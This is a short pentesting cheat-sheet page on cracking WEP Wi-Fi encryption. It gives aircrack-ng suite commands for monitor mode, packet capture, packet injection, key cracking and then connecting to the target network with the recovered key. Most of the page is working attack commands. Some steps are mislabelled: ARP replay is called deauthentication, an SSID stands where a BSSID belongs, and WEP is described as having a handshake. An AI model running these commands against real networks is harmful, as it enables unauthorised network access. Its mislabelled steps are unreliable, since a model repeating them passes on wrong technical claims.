# Attack WEP

Ref:

{% embed url="<https://github.com/ricardojoserf/wifi-pentesting-guide?tab=readme-ov-file#3>" %}

1. **Start Monitor mode:**

```
# start monitor mode
sudo airmon-ng start wlan0

# stop monitor mode / wanna connect the wifi
sudo airmon-ng stop wlan0


# filter wps encryption
sudo airodump-ng wlan0mon --wps
```

2. **Start capture hash of the handshake:**

<pre><code><strong>sudo airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w capture_WEP wlan0
</strong></code></pre>

In parallel run deauthentication attack:

```
sudo aireplay-ng -3 -b $NAME_OF_SSID -h $STATION_MAC wlan0
```

3. **crack the handshake**

```
sudo aircrack-ng capture_WEP.cap
```

***

After cracking, you can directly connect the WiFi by the UI or terminal below:

{% hint style="info" %}
Make sure **stop** the monitor mode before connecting
{% endhint %}

```
sudo iwconfig wlan0 essid <target SSID Name> key <hexKey>

# refresh the DHCP Configuration
sudo dhclient wlan0
```

Stuck?

\--> <https://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html>

<http://www.onnocenter.or.id/wiki/index.php/Attacks:_WEP_Cracking,_WPA_Handshake_Capture>

<https://www.youtube.com/watch?v=e667NA3aPqY>